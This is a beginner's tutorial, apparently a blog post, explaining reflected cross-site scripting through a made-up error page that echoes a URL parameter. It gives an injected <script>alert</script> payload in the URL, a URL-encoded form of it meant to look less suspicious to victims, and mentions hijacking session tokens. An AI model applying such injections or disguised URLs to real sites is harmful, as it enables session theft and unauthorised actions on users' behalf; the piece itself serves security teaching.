XSS or Cross Site Scripting is kind of web application vulnerability which allow the attacker to target other users of the application in order to gain access to their data and performing unauthorized on their behalf. (BUT you can not own a web application just via XSS)
Simply, by XSS the attacker can inject client side scripts into website source code that the victim will open it and in most cases execute it.
XSS can be used for many different purposes but one of the most common usages of XSS is capturing the session token of an authenticated user. By hijacking the session the attacker is capable of access to all data and functionality that the user is authorized.
As an example, www.mdtest.com have a page which show an error by an input parameter, like www.mdtest.com/err?msg=”page not found” .
If you look in the page source code, you will see that the message which appear in the url is shown exactly as the message.
Thats it!
By changing the url to www.mdtest.com/err?msg=<script>alert(‘ Hello dear XSS victim’);</script> and loading the page, you will see an message from the website which says so! and the message has been injected into the page source.
It’s sooo simple, in face it is one of the most simple usages of XSS.
There are two problem,
This method is so simple and can do nothing except showing the problem! and it’ obvious that the URL is not normal !!
First, for the second problem, you can put you scripts in a file that uploaded to a server and then you can also encode your url. I encode sample URL and the result is: www.mdtest.com%2Ferr%3Fmsg%3D%3Cscript%3Ealert(‘%20Hello%20dear%20XSS%20victim’)%3B%3C%2Fscript%3E
I do not want to discuss about encoding/decoding; therefore just see this as an example: http://meyerweb.com/eric/tools/dencoder/
And for the first problem, there are dozens of approaches to make an advance script to fetch desired data by executing appropriate script. You can also combine this method to other web application vulnerabilities to gain much better result …
And always keep in mind that, these training are just for beginners of computer security science.
There is a useful book for professionals: http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543
